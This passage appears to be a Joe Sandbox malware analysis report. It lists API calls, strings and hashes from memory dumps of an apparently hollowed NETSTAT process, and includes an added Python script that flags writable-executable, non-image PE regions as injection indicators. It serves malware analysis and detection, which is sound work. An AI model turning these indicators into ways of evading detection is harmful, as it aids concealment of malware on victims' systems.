• CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 006458FC
• FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 0064590F
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
• Opcode ID: fdf4e892d53d8bc5bae3d1ede6c5f5fb568a9ca8e40b79f8b75ad9391e0de9c0
• Instruction ID: 73b52ee44404e34ae17884a6d6899297ef2e87b1dc424406803c2666a4b8ff04
• Opcode Fuzzy Hash: fdf4e892d53d8bc5bae3d1ede6c5f5fb568a9ca8e40b79f8b75ad9391e0de9c0
• Instruction Fuzzy Hash: E2011AB591020AAFDF00DFE0CD859FEBBB9FB05300F50146AA512A3141DB749A05CB60
APIs
• SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_00005D70), ref: 00645DC5
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 92d82e05d1968431aad957722df396c568294cab242ef1dfed7da415e582c706
• Instruction ID: c9c09fe18b93ef1eb7f88986be2000fa8f5ff25ab7f5cf384ec89d1b3115131c
• Opcode Fuzzy Hash: 92d82e05d1968431aad957722df396c568294cab242ef1dfed7da415e582c706
• Instruction Fuzzy Hash: 029002646A1E004F474067B05D0D50925925E59A027822450A142D5095DE5040445915
APIs
• fflush.MSVCRT ref: 00644740
  • Part of subcall function 00644530: _fileno.MSVCRT ref: 0064453B
  • Part of subcall function 00644530: _get_osfhandle.MSVCRT ref: 00644542
• _fileno.MSVCRT ref: 00644760
• _setmode.MSVCRT ref: 00644768
• wcschr.MSVCRT ref: 0064478B
• _fileno.MSVCRT ref: 006447B1
• _setmode.MSVCRT ref: 006447B9
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0064203C), ref: 006447D7
• LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000,?,?,?,?,?,?,?,0064203C,00000000,?,00000000,000000FF), ref: 006447E7
• WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,0064203C), ref: 00644805
• _fileno.MSVCRT ref: 00644812
• _write.MSVCRT ref: 0064481A
• fwprintf.MSVCRT ref: 0064482B
• fflush.MSVCRT ref: 00644835
• _fileno.MSVCRT ref: 0064483E
• _setmode.MSVCRT ref: 00644846
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00644853
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
• String ID: %ls$< d
• API String ID: 2233937912-483866885
• Opcode ID: b48db332b737153219b38ed406433f23ddd0973c95f689ff3d35e743680c104d
• Instruction ID: a259c589f9108668db03f0333064f770da94eb8a2af9e16d0d3378da24e8733e
• Opcode Fuzzy Hash: b48db332b737153219b38ed406433f23ddd0973c95f689ff3d35e743680c104d
• Instruction Fuzzy Hash: 76319076900205FFEB015BA0EC4EFEF7B7AEB46721F20442AF511E3290EF7499029A54
APIs
• time.MSVCRT(00000000,00000000,000000FF), ref: 0064495F
• GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00644975
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064497F
• LoadLibraryExA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000), ref: 006449C7
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,SnmpMgrOidToStr), ref: 006449D7
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressDirectoryErrorLastLibraryLoadProcSystemtime
                                                                                                                                                                                  • String ID: SnmpExtensionInit$SnmpExtensionQuery$SnmpMgrOidToStr
                                                                                                                                                                                  • API String ID: 698272139-2433094189
                                                                                                                                                                                  • Opcode ID: 9086e8bc0a553baf58bbb9bf4493a2b2d7a2f8c99b3451668be16e988714d1c0
                                                                                                                                                                                  • Instruction ID: 57b546bea7fb4cfbe9227718e4fb107875da17a93970d0fff391bf9528d59426
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9086e8bc0a553baf58bbb9bf4493a2b2d7a2f8c99b3451668be16e988714d1c0
                                                                                                                                                                                  • Instruction Fuzzy Hash: C331A679600219AFCB15DFB4DD4ABEE77AFAB06700B005196E901E7250DF70DE45CB90
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: bb291f024f4a672aa177a462bf2f071d1896d1dde72e4bb8125e46b052edc385
• Instruction ID: 3eab470fa2002024d63b6ce2f26909697e1ba15a52cdd7fbd0edf7d1c223cce4
• Opcode Fuzzy Hash: bb291f024f4a672aa177a462bf2f071d1896d1dde72e4bb8125e46b052edc385
• Instruction Fuzzy Hash: E551E9B5A0016ABFCB14DB9C89909BEFBF8BF0C2007158679E4A5DB641D374DE6187A0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
• Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 1077928971387440b81773d3a55cb600809f02a000e92f2b23ae50c0a7fcf58f
• Instruction ID: a7415c5fe3b990d1350a4c678f3608c1257f167e80385a434f1bf522c935034e
• Opcode Fuzzy Hash: 1077928971387440b81773d3a55cb600809f02a000e92f2b23ae50c0a7fcf58f
• Instruction Fuzzy Hash: 0D5106B9A40645AFCB31EF9CC8908BFF7F9EF4C200B448899E496D7641D7B4DA418B64
APIs
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006445D1
• _wcsicmp.MSVCRT ref: 006445F2
• _wcsicmp.MSVCRT ref: 0064460D
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: _wcsicmp$EnvironmentVariable
• String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
• API String ID: 198002717-1479523454
• Opcode ID: 9ffeb62cddcb5f7d919410b4d5ad1dc92ac9899080583e5e6239dae09c232551
• Instruction ID: f2596c2fb60f6c25d3798a158102706aeea479a1f7085666243a96e80aecfe10
• Opcode Fuzzy Hash: 9ffeb62cddcb5f7d919410b4d5ad1dc92ac9899080583e5e6239dae09c232551
• Instruction Fuzzy Hash: AB11E039600306AFDB249B24EC0ABEE77EADF47725F51045AE041D7180EFB0EAC0CA15
APIs
• GetHostNameW.WS2_32(00647CD8,00000104), ref: 0064365F
• wcschr.MSVCRT ref: 00643676
• GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436A2
• GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436C9
• GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006436F5
• GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00643726
• wcschr.MSVCRT ref: 00643783
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: Name$Info$wcschr$Host
• String ID: %s:%s$[%s]:%s
• API String ID: 3401028553-3707195743
• Opcode ID: 508a34d21d5e8549f33e280b0a991562cc53eadfe90cc807f65b9e0fce414d0f
• Instruction ID: 45bbc4b8550fe76245c71651a4e51e40e1a78783dc34feee436979f38a345848
• Opcode Fuzzy Hash: 508a34d21d5e8549f33e280b0a991562cc53eadfe90cc807f65b9e0fce414d0f
• Instruction Fuzzy Hash: 7651CFB5A0022AAFDF249F14CC40AEA777AEF46741F0140A9FA89A7350D7709F85CF95
APIs
  • Part of subcall function 00641C89: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0064222F), ref: 00641CA2
  • Part of subcall function 00641C89: OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0064222F), ref: 00641CA9
  • Part of subcall function 00641C89: AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00641CD9
  • Part of subcall function 00641C89: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641CE7
  • Part of subcall function 006448A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006443B7,0000275D,00000000,00000000,?), ref: 006448CA
• NsiAllocateAndGetTable.NSI(00000001,00641100,00000002,?,0000003C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,?,00000000,000000FF), ref: 006429C3
• NsiAllocateAndGetTable.NSI(00000001,00641100,00000003,?,00000020,00000000,00000000,00000000,00000000,?,00000008,?,00000000), ref: 00642A02
  • Part of subcall function 006435EE: GetHostNameW.WS2_32(00647CD8,00000104), ref: 0064365F
  • Part of subcall function 006435EE: wcschr.MSVCRT ref: 00643676
  • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006436F5
  • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00643726
  • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436A2
  • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436C9
  • Part of subcall function 006435EE: wcschr.MSVCRT ref: 00643783
• NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00642C07
• NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00642C1B
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C2C
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C37
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C48
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C59
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C6A
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C7B
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: Free$Local$Name$InfoTable$AllocateProcessTokenwcschr$AdjustCloseCurrentFormatHandleHostMessageOpenPrivileges
• String ID:
• API String ID: 3162703053-0
• Opcode ID: 96374b96533146962305561b57248031caad44b31a1de46400eab80f9c8b7c5d
• Instruction ID: 14bca6a6bd98b55efa711732e77f8a526dacc8488eacca6178796af126447a41
• Opcode Fuzzy Hash: 96374b96533146962305561b57248031caad44b31a1de46400eab80f9c8b7c5d
• Instruction Fuzzy Hash: F0E15071D08329AFEB619F50CC85BE9B3BAEB04744F1440D9F50DA6280DA78AEC4CF51
APIs
• NsiAllocateAndGetTable.NSI(00000001,00641118,00000003,00000017,00000038,00000000,00000000,00000000,00000010,?,00000020,006424B9,00000000,00000000,0000274F,00000000), ref: 00641DB3
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006424AD,?,?,?,?,?,?,?,?,?,?,?,006424B9,00000000), ref: 00641DDA
• NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006424B9), ref: 00641DF0
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006424AD,?,?,?,?,?,?,?,?,?,?,?,006424B9,00000000), ref: 00641E0B
• memset.MSVCRT ref: 00641EBB
• NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006424B9), ref: 00641F71
Strings
Memory Dump Source
• Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
Similarity
• API ID: Table$AllocFreeHeap$Allocatememset
• String ID: 8$p^v
• API String ID: 1604459968-753539834
• Opcode ID: 7eac00e68b16a94577bf777e0732e97e733c21ec3d4de9fe4d54695174813423
                                                                                                                                                                                  • Instruction ID: 73f277a6fa5a3d89f57ec2ac0d84ab400b98f14d1126ff7af95fb82035d9db15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eac00e68b16a94577bf777e0732e97e733c21ec3d4de9fe4d54695174813423
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7281C6B5D00219EFDB54CF98C981AADBBB5FF09714F24809AE905AB341D371AE81DF90
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03144742
                                                                                                                                                                                  • Execute=1, xrefs: 03144713
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03144725
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03144787
                                                                                                                                                                                  • ExecuteOptions, xrefs: 031446A0
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031446FC
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03144655
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: 76b1e8ba4d15ebc69eb9cd54cbb900e0fb9b2f7eb7fa832b6a892e4774ad1c52
                                                                                                                                                                                  • Instruction ID: 1301af3ea4c22078c5b4e0cfccc2bb786d364e09d5884793b46a529022170d36
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76b1e8ba4d15ebc69eb9cd54cbb900e0fb9b2f7eb7fa832b6a892e4774ad1c52
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8510975A00319ABEF15EBA5DC99BED77B8AF0C340F1400A9E505AB1C1DBB1AA85CF50
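The two Memory Dump Source descriptors above (the region at 0x640000 carrying netstat's own code, and the region at 0x030A0000 carrying ntdll strings) encode the evidence behind the report's process hollowing and injection signatures: both are PE-backed, both are marked with protection 0x40 (PAGE_EXECUTE_READWRITE), and neither is a loader-mapped image. The following Python is an added example and is not part of the Joe Sandbox report or its tooling. It decodes descriptors of this shape and flags the combinations an analyst looks for. The field order of the .sdmp name (process index, iteration, dump id, base address, protection, an undecoded field, region type, an undecoded field) is an assumption inferred from the descriptors on this page; the protection and type values are the standard Windows constants; process index 7 is tied to NETSTAT only through the snapshot file names shown here. The third input line is constructed to show what a benign loader-mapped image looks like.

```python
"""Decode Joe Sandbox memory-dump descriptors and flag injection indicators.

Added example, not part of the Joe Sandbox report or its tooling. The field
order of the .sdmp file name is an ASSUMPTION inferred from the descriptors on
this page; the protection and type constants are the documented Windows ones.
"""
import re
from dataclasses import dataclass

# Memory protection constants (winnt.h)
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80

EXECUTABLE = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
MEM_TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# ASSUMED layout: <process>.<iteration>.<dump id>.<base>.<protection>.<?>.<type>.<?>.sdmp
DESCRIPTOR_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<iter>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)
SOURCE_LINE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*[0-9A-Fa-f]+,"
    r"\s*based on PE:\s*(?P<pe>true|false)",
    re.IGNORECASE,
)


@dataclass
class DumpRegion:
    process_index: int
    base: int
    protect: int
    mem_type: int
    pe_backed: bool
    name: str


def parse_source_line(line: str) -> DumpRegion:
    """Parse one 'Source File: <name>.sdmp, Offset: ..., based on PE: ...' report line."""
    m = SOURCE_LINE_RE.search(line)
    if not m:
        raise ValueError(f"not a Memory Dump Source line: {line!r}")
    d = DESCRIPTOR_RE.fullmatch(m.group("name"))
    if not d:
        raise ValueError(f"unrecognised .sdmp descriptor: {m.group('name')}")
    return DumpRegion(
        process_index=int(d.group("proc"), 16),
        base=int(d.group("base"), 16),
        protect=int(d.group("protect"), 16),
        mem_type=int(d.group("memtype"), 16),
        pe_backed=m.group("pe").lower() == "true",
        name=m.group("name"),
    )


def indicators(region: DumpRegion) -> list[str]:
    """Injection/hollowing indicators for one region; an empty list means nothing stands out."""
    found = []
    prot = region.protect & 0xFF  # drop modifiers such as PAGE_GUARD / PAGE_NOCACHE
    if prot & EXECUTABLE and prot & WRITABLE:
        found.append("rwx")  # executable memory that is also writable
    if region.pe_backed and region.mem_type != MEM_IMAGE:
        # a PE header in private or mapped memory was not placed there by the loader
        found.append("pe_outside_image")
    return found


def triage(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (descriptor name, indicators) for every Memory Dump Source line given."""
    return [(r.name, indicators(r)) for r in map(parse_source_line, lines)]


# The first two lines are copied from this report (process 7, which the snapshot file
# names tie to NETSTAT). The third is CONSTRUCTED: a loader-mapped, read/execute image.
REPORT_LINES = [
    "Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true",
    "Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true",
    "Source File: 00000007.00000002.4100000000.0000000077000000.00000020.00001000.01000000.00000000.sdmp, Offset: 77000000, based on PE: true",
]

if __name__ == "__main__":
    for region in map(parse_source_line, REPORT_LINES):
        flags = indicators(region)
        print(f"proc#{region.process_index} base=0x{region.base:X} protect=0x{region.protect:02X} "
              f"type={MEM_TYPE_NAMES.get(region.mem_type, hex(region.mem_type))} "
              f"pe={region.pe_backed} -> {', '.join(flags) or 'clean'}")
```

Run against the two descriptors from this page, both regions come back as `rwx, pe_outside_image`: a PE image sitting in MEM_MAPPED memory at 0x640000 and another in MEM_PRIVATE memory at 0x030A0000, both writable and executable, inside a process whose snapshot names it as netstat. The constructed MEM_IMAGE/PAGE_EXECUTE_READ line comes back clean, which is what a module mapped by the Windows loader looks like.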
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00644530: _fileno.MSVCRT ref: 0064453B
                                                                                                                                                                                    • Part of subcall function 00644530: _get_osfhandle.MSVCRT ref: 00644542
                                                                                                                                                                                    • Part of subcall function 006445AB: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006445D1
                                                                                                                                                                                    • Part of subcall function 006445AB: _wcsicmp.MSVCRT ref: 006445F2
                                                                                                                                                                                  • fgetpos.MSVCRT ref: 00644697
                                                                                                                                                                                  • _fileno.MSVCRT ref: 006446B1
                                                                                                                                                                                  • _setmode.MSVCRT ref: 006446B9
                                                                                                                                                                                  • fwprintf.MSVCRT ref: 006446C5
                                                                                                                                                                                  • fgetpos.MSVCRT ref: 006446DE
                                                                                                                                                                                  • _fileno.MSVCRT ref: 006446F8
                                                                                                                                                                                  • _setmode.MSVCRT ref: 00644700
                                                                                                                                                                                  • _fileno.MSVCRT ref: 00644710
                                                                                                                                                                                  • _write.MSVCRT ref: 00644718
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2328354365-0
                                                                                                                                                                                  • Opcode ID: 06e45474269ab012abea6a3605c9b748eced1b668e288de67a32e1cdf6220119
                                                                                                                                                                                  • Instruction ID: d4ec80a297c33a731dc7236ec66b8775bbf26aaf7b8a8638616b664eb9e8f564
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e45474269ab012abea6a3605c9b748eced1b668e288de67a32e1cdf6220119
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1110335900215EFDB14ABE4FC4FADE77AAFF073A3B201456E401E3690EF749A428655
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00646160,0000000C), ref: 00645A30
                                                                                                                                                                                  • _amsg_exit.MSVCRT ref: 00645A45
                                                                                                                                                                                  • _initterm.MSVCRT ref: 00645A99
                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00645AC5
                                                                                                                                                                                  • exit.MSVCRT ref: 00645B0C
                                                                                                                                                                                  • _XcptFilter.MSVCRT ref: 00645B1E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 796493780-0
                                                                                                                                                                                  • Opcode ID: adc0251a82c45d051d70069746527bec6a34c62a8ad737c1049832660ed33e01
                                                                                                                                                                                  • Instruction ID: f93a5b8cb0f352e4bdd0681591f16c4ed1116c1959968a1032baa221b0be8945
                                                                                                                                                                                  • Opcode Fuzzy Hash: adc0251a82c45d051d70069746527bec6a34c62a8ad737c1049832660ed33e01
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC312439608B15DFDB25EF64EC45A2977A3EB06720F10162DE503973A2DB704C81CF80
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _fileno.MSVCRT ref: 0064453B
                                                                                                                                                                                  • _get_osfhandle.MSVCRT ref: 00644542
                                                                                                                                                                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000), ref: 00644558
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00644564
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064456E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3475475711-0
                                                                                                                                                                                  • Opcode ID: 00fbb8d4d17c6bb626d08d3df3e4858e6be5bec63834f988d388ba47dfc75e85
                                                                                                                                                                                  • Instruction ID: 95012a2246a9e4e4ffc7e806b22ae9b4fe0c79d7dad0c85a93a046bfdbbf3238
                                                                                                                                                                                  • Opcode Fuzzy Hash: 00fbb8d4d17c6bb626d08d3df3e4858e6be5bec63834f988d388ba47dfc75e85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E01D677A24100AF9B28ABB5AC4EABF379BDA86B717105525F512E3290EF30CC018170
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                   • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: 03df6fe3dd6789cc965954fdf4fea96af481ac19c549a56a8ab5b90411ace55f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
